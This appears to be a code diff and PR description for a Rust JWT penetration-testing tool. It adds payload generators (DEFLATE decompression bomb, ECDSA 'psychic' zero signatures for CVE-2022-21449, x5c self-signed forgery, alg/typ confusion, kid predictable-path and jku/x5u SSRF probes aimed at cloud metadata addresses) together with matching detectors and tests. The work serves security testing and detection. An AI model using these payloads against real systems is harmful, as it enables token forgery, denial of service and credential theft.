+/// compression bomb where the encoded claims segment is small but decompresses
+/// to a large JSON object — useful for probing DoS handling.
+pub fn generate_zip_payload(token: &str) -> Result<Vec<String>> {
+    let claims_part = extract_claims_part(token)?;
+    let mut payloads = Vec::new();
+
+    // Non-standard zip header values — claims segment stays the original.
+    for zip_val in [
+        json!("GZIP"),
+        json!("unknown"),
+        json!(""),
+        serde_json::Value::Null,
+        json!(["DEF"]),
+    ] {
+        let header = json!({ "alg": "HS256", "typ": "JWT", "zip": zip_val });
+        payloads.push(encode_header_with_claims(&header, claims_part)?);
+    }
+
+    // Decompression bomb: payload of 1 MiB of 'A' characters wrapped in a JSON
+    // string. DEFLATE compresses this down to a few hundred bytes; the server
+    // pays the decompression cost.
+    let bomb_json = format!("{{\"data\":\"{}\"}}", "A".repeat(1024 * 1024));
+    let compressed = crate::utils::compression::compress_deflate(bomb_json.as_bytes())?;
+    let bomb_claims_b64 = general_purpose::URL_SAFE_NO_PAD.encode(&compressed);
+    let bomb_header = json!({ "alg": "HS256", "typ": "JWT", "zip": "DEF" });
+    let bomb_header_json = serde_json::to_string(&bomb_header)?;
+    let bomb_header_b64 = general_purpose::URL_SAFE_NO_PAD.encode(bomb_header_json.as_bytes());
+    // Sign with empty HMAC so downstream test consumers can verify shape; the
+    // server may reject before signature check, which is itself useful info.
+    let signing = format!("{bomb_header_b64}.{bomb_claims_b64}");
+    payloads.push(sign_hs256(&signing, b""));
+
+    info!("Generated zip variant + decompression bomb payloads");
+    Ok(payloads)
+}
+
+/// Generate `kid` payloads pointing at predictable, content-stable files.
+///
+/// When `secret_bytes` is provided, every payload is HS256-signed with those
+/// bytes (matching the file's contents on disk). With `None`, only the empty
+/// secret is assumed — useful for `/dev/null`-style nulls, otherwise the
+/// caller should re-sign with the file's bytes once known.
+pub fn generate_kid_predictable_payload(
+    token: &str,
+    secret_bytes: Option<&[u8]>,
+) -> Result<Vec<String>> {
+    let claims_part = extract_claims_part(token)?;
+
+    let candidate_paths = [
+        "css/main.css",
+        "static/css/main.css",
+        "js/main.js",
+        "static/js/main.js",
+        "robots.txt",
+        "favicon.ico",
+        "index.html",
+        "../static/css/main.css",
+        "../../static/css/main.css",
+        "../../../static/css/main.css",
+        "public/index.html",
+        "assets/logo.svg",
+    ];
+
+    let secret = secret_bytes.unwrap_or(b"");
+    let mut payloads = Vec::with_capacity(candidate_paths.len());
+    for kid in candidate_paths {
+        let header = json!({
+            "alg": "HS256",
+            "typ": "JWT",
+            "kid": kid,
+        });
+        let input = build_signing_input(&header, claims_part)?;
+        payloads.push(sign_hs256(&input, secret));
+    }
+    info!(
+        "Generated kid predictable-path payloads ({} bytes secret)",
+        secret.len()
+    );
+    Ok(payloads)
+}
+
 /// Generate all available payloads for a token
 pub fn generate_all_payloads(
     token: &str,
@@ -516,6 +788,41 @@ pub fn generate_all_payloads(
     // Empty / stripped signature payloads
     if should_generate_all || targets.contains("empty_sig") {
         payloads.extend(generate_empty_sig_payload(token)?);
+    }
+
+    // x5c self-signed certificate (real, signed attack)
+    if should_generate_all || targets.contains("x5c_signed") {
+        payloads.push(generate_x5c_signed_payload(token)?);
+    }
+
+    // ECDSA psychic signatures (CVE-2022-21449)
+    if should_generate_all || targets.contains("psychic") {
+        payloads.extend(generate_psychic_signature_payload(token)?);
+    }
+
+    // typ confusion header variants
+    if should_generate_all || targets.contains("typ_confusion") {
+        payloads.extend(generate_typ_confusion_payload(token)?);
+    }
+
+    // alg edge values
+    if should_generate_all || targets.contains("alg_edge") {
+        payloads.extend(generate_alg_edge_payload(token)?);
+    }
+
+    // jku/x5u SSRF probes (no --jwk-attack required)
+    if should_generate_all || targets.contains("ssrf") {
+        payloads.extend(generate_jku_x5u_ssrf_payload(token)?);
+    }
+
+    // zip variants + decompression bomb
+    if should_generate_all || targets.contains("zip") {
+        payloads.extend(generate_zip_payload(token)?);
+    }
+
+    // kid predictable-path payloads (empty secret; CLI may pass bytes later)
+    if should_generate_all || targets.contains("kid_predictable") {
+        payloads.extend(generate_kid_predictable_payload(token, None)?);
     }
 
     Ok(payloads)
@@ -1090,5 +1397,143 @@ mod tests {
             get_header_from_token(p).and_then(|h| h.get("b64").and_then(|v| v.as_bool()))
                 == Some(false)
         }));
+    }
+
+    #[test]
+    fn test_generate_psychic_signature_zero_sigs() {
+        let payloads = generate_psychic_signature_payload(DUMMY_TOKEN).expect("psychic ok");
+        assert_eq!(payloads.len(), 3);
+
+        let expected_lens = [("ES256", 64usize), ("ES384", 96), ("ES512", 132)];
+        for (p, (alg, len)) in payloads.iter().zip(expected_lens.iter()) {
+            let parts: Vec<&str> = p.split('.').collect();
+            assert_eq!(parts.len(), 3);
+            let header = get_header_from_token(p).unwrap();
+            assert_eq!(header.get("alg").unwrap().as_str(), Some(*alg));
+            let sig = URL_SAFE_NO_PAD.decode(parts[2]).unwrap();
+            assert_eq!(sig.len(), *len);
+            assert!(sig.iter().all(|b| *b == 0));
+        }
+    }
+
+    #[test]
+    fn test_generate_typ_confusion_variants() {
+        let payloads = generate_typ_confusion_payload(DUMMY_TOKEN).expect("typ ok");
+        // At least the documented variants are present.
+        let typ_values: Vec<Option<String>> = payloads
+            .iter()
+            .map(|p| {
+                get_header_from_token(p)
+                    .and_then(|h| h.get("typ").and_then(|v| v.as_str().map(String::from)))
+            })
+            .collect();
+        assert!(typ_values.contains(&Some("at+jwt".to_string())));
+        assert!(typ_values.contains(&Some("JOSE".to_string())));
+        assert!(typ_values.contains(&None), "one variant must omit typ");
+    }
+
+    #[test]
+    fn test_generate_alg_edge_variants() {
+        let payloads = generate_alg_edge_payload(DUMMY_TOKEN).expect("alg edge ok");
+        // Empty string, null, and an array variant must each appear.
+        let algs: Vec<serde_json::Value> = payloads
+            .iter()
+            .filter_map(|p| get_header_from_token(p).and_then(|h| h.get("alg").cloned()))
+            .collect();
+        assert!(algs
+            .iter()
+            .any(|v| v == &serde_json::Value::String(String::new())));
+        assert!(algs.iter().any(|v| v == &serde_json::Value::Null));
+        assert!(algs.iter().any(|v| v.is_array()));
+    }
+
+    #[test]
+    fn test_generate_jku_x5u_ssrf_emits_both_keys_and_imds() {
+        let payloads = generate_jku_x5u_ssrf_payload(DUMMY_TOKEN).expect("ssrf ok");
+        let mut saw_jku_imds = false;
+        let mut saw_x5u_imds = false;
+        for p in &payloads {
+            let h = get_header_from_token(p).unwrap();
+            if let Some(u) = h.get("jku").and_then(|v| v.as_str()) {
+                if u.contains("169.254.169.254") {
+                    saw_jku_imds = true;
+                }
+            }
+            if let Some(u) = h.get("x5u").and_then(|v| v.as_str()) {
+                if u.contains("169.254.169.254") {
+                    saw_x5u_imds = true;
+                }
+            }
+        }
+        assert!(saw_jku_imds, "expected jku payload with IMDS URL");
+        assert!(saw_x5u_imds, "expected x5u payload with IMDS URL");
+    }
+
+    #[test]
+    fn test_generate_zip_payload_bomb_decompresses_large() {
+        let payloads = generate_zip_payload(DUMMY_TOKEN).expect("zip ok");
+        // The bomb variant should have zip=DEF and a small encoded claims part
+        // that decompresses to substantially more bytes than the raw segment.
+        let bomb = payloads
+            .iter()
+            .find(|p| {
+                let h = get_header_from_token(p).unwrap();
+                h.get("zip").and_then(|v| v.as_str()) == Some("DEF")
+            })
+            .expect("bomb variant present");
+        let parts: Vec<&str> = bomb.split('.').collect();
+        let claims_compressed = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
+        let decompressed =
+            crate::utils::compression::decompress_deflate(&claims_compressed).unwrap();
+        assert!(
+            decompressed.len() > claims_compressed.len() * 50,
+            "bomb should expand >50x: compressed={}, decompressed={}",
+            claims_compressed.len(),
+            decompressed.len()
+        );
+    }
+
+    #[test]
+    fn test_generate_kid_predictable_signs_with_provided_secret() {
+        let secret = b"body{color:red}";
+        let payloads =
+            generate_kid_predictable_payload(DUMMY_TOKEN, Some(secret)).expect("kid pred ok");
+        assert!(!payloads.is_empty());
+        for p in &payloads {
+            let parts: Vec<&str> = p.split('.').collect();
+            assert_eq!(parts.len(), 3);
+            let input = format!("{}.{}", parts[0], parts[1]);
+            let expected = hmac_sha256::HMAC::mac(input.as_bytes(), secret);
+            let expected_b64 = URL_SAFE_NO_PAD.encode(expected.as_slice());
+            assert_eq!(parts[2], expected_b64);
+        }
+    }
+
+    #[test]
+    fn test_generate_x5c_signed_payload_verifies_against_embedded_cert() {
+        use jsonwebtoken::{Algorithm, DecodingKey, Validation};
+        let token = generate_x5c_signed_payload(DUMMY_TOKEN).expect("x5c signed ok");
+        let header = get_header_from_token(&token).expect("header");
+        let x5c = header.get("x5c").unwrap().as_array().unwrap();
+        let cert_b64 = x5c[0].as_str().unwrap();
+        // x5c is standard base64, not URL-safe.
+        let cert_der = base64::engine::general_purpose::STANDARD
+            .decode(cert_b64)
+            .unwrap();
+
+        // Parse the cert with openssl and grab the public key as PEM.
+        let cert = openssl::x509::X509::from_der(&cert_der).unwrap();
+        let pubkey_pem = cert.public_key().unwrap().public_key_to_pem().unwrap();
+
+        let key = DecodingKey::from_rsa_pem(&pubkey_pem).unwrap();
+        let mut v = Validation::new(Algorithm::RS256);
+        v.validate_exp = false;
+        v.required_spec_claims.clear();
+        let result = jsonwebtoken::decode::<serde_json::Value>(&token, &key, &v);
+        assert!(
+            result.is_ok(),
+            "signature should verify with the embedded cert's key: {:?}",
+            result.err()
+        );
     }
 }


### PR DESCRIPTION
## Summary

Round 2 of attack coverage expansion. Adds seven new payload categories — most producing **fully verifiable signed tokens** — and the matching scan detectors. Also refactors \`run_scan\` so shape checks fire on the very malformed tokens they're designed to catch (the previous version's checks were dead code for tokens \`jwt::decode\` rejected).

### New payload generators (\`src/payload/mod.rs\`)
- **\`x5c_signed\`** — RSA-2048 + self-signed X.509 via openssl, DER embedded in \`x5c\` (standard base64 per RFC 7515 §4.1.6), signed with the matching private key. Mirror of \`jwk_embed\` for \`x5c\`-trusting verifiers.
- **\`psychic\`** — CVE-2022-21449 (Java JDK 15–18 ECDSA r=s=0). ES256/384/512 variants with all-zero signature bytes.
- **\`typ_confusion\`** — typ omitted, \`at+jwt\`, \`JOSE\`, \`JOSE+JSON\`, \`application/jwt\`, lowercase, trailing NUL.
- **\`alg_edge\`** — \`alg=\"\"\`, \`null\`, \` HS256 \`, \`\\tHS256\`, \`hs256\`, \`HS256\\0\`, array forms.
- **\`ssrf\`** — built-in SSRF probe URLs (AWS IMDS, GCP metadata, Azure IMDS, loopback Redis/Memcached/HTTP, \`file://\`, \`gopher://\`, \`::1\`, \`0.0.0.0\`) for both \`jku\` and \`x5u\`. No \`--jwk-attack\` required.
- **\`zip\`** — non-standard \`zip\` values plus a real DEFLATE bomb (1 MiB → ~few hundred bytes, HS256-signed with empty secret).
- **\`kid_predictable\`** — common static-asset paths (\`css/main.css\`, \`robots.txt\`, \`favicon.ico\`, …) with an optional \`secret_bytes\` arg that signs each variant with the file's bytes.

### New scan checks (\`src/cmd/scan.rs\`)
- \`check_typ_confusion\` (Medium for at+jwt/JOSE/JWT\\0; Low if missing)
- \`check_alg_edge\` parses the raw header JSON and flags array/null/empty/whitespace/NUL \`alg\`.
- \`check_psychic_signature\` (Critical) decodes the signature and flags ECDSA tokens with all-zero sigs.
- \`check_zip_header\` — Low for \`zip:DEF\` (decompression-bomb hint), Medium for non-string or non-\"DEF\" values.

### Refactor: shape checks survive strict-decode failure
\`run_scan\` now falls back to a header-only \`DecodedToken\` when \`jwt::decode\` rejects the token (array alg, null alg, whitespace alg, compressed-but-malformed claims, …), so the shape detectors actually fire on the very tokens they're meant to detect. \`check_alg_edge\` and \`check_algorithm_confusion\` read alg from the raw header instead of the parsed \`Algorithm\` enum so they work on synthetic-decoded inputs. The summary prints a \"Strict decode rejected: <err>\" line when the fallback was used. Claim-dependent checks (weak secret, expiration, missing claims, sensitive claims) are gated on \`strict_ok\` to avoid noise on synthetic claims.

### CLI
New \`--target\` values: \`ssrf\`, \`alg_edge\`, \`kid_predictable\`, \`x5c_signed\`, \`psychic\`, \`typ_confusion\`, \`zip\`. All participate in \`--target all\`.

## Test plan
- [x] \`cargo test --lib --bins\` — 276 passed, 0 failed (+16 from new tests)
- [x] \`cargo fmt --check\` clean
- [x] \`cargo clippy --lib --bins --tests -- -D warnings\` clean
- [x] Smoke: \`scan\` on an alg-array token now reports the \"Strict decode rejected\" line plus an \`alg Edge Value\` HIGH finding (previously the scan bailed before running any checks)
- [x] Smoke: \`scan\` on a generated psychic ES256 token reports Critical
- [x] Smoke: \`x5c_signed\` token round-trips through \`jsonwebtoken::decode\` with the embedded cert's public key